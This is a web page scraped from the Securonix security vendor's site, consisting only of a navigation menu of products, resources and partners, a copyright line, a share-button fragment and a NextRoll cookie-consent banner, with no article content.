* Cloud Security
* Google Cloud Platform
* Microsoft Azure
* Microsoft 365
* Amazon Web Services
* Insider Threat
* NDR
* EMR Monitoring
* Healthcare
* Manufacturing
* Financial Services
* Resources
* Resource Library
* Threat Labs
* Legal Center
* Open Source Software Listing – 5.0
* Open Source Software Listing – 6.0
* Company
* About
* Newsroom
* Careers
* Blog
* Services
* Training
* Support Services
* Professional Services
* Partners
* Global System Integrators
* MSSPs
* Solution Providers
* Technology Alliance
* Distributors
* Partner Portal Login
Securonix 2024. All Rights Reserved
Legal Center | Privacy Policy
*
*
*
*
*
Contact Us
✓
Danke für das Teilen!
AddToAny
Mehr…
×
We Value Your Privacy
Settings
NextRoll, Inc. ("NextRoll") and our 18 advertising partners use cookies and
similar technologies on this site and use personal data (e.g., your IP address).
If you consent, the cookies, device identifiers, or other information can be
stored or accessed on your device for the purposes described below. You can
click "Allow All" or "Decline All" or click Settings above to customise your
consent regarding the purposes and features for which your personal data will be
processed and/or the partners with whom you will share personal data.
NextRoll and our advertising partners process personal data to: ● Store and/or
access information on a device; ● Create a personalised content profile; ●
Select personalised content; ● Personalised advertising, advertising
measurement, audience research and services development; ● Services development.
For some of the purposes above, our advertising partners: ● Use precise
geolocation data. Some of our partners rely on their legitimate business
interests to process personal data. View our advertising partners if you wish to
provide or deny consent for specific partners, review the purposes each partner
believes they have a legitimate interest for, and object to such processing.
If you select Decline All, you will still be able to view content on this site
and you will still receive advertising, but the advertising will not be tailored
for you. You may change your setting whenever you see the Manage consent
preferences on this site.
Decline All
Allow All
Manage consent preferences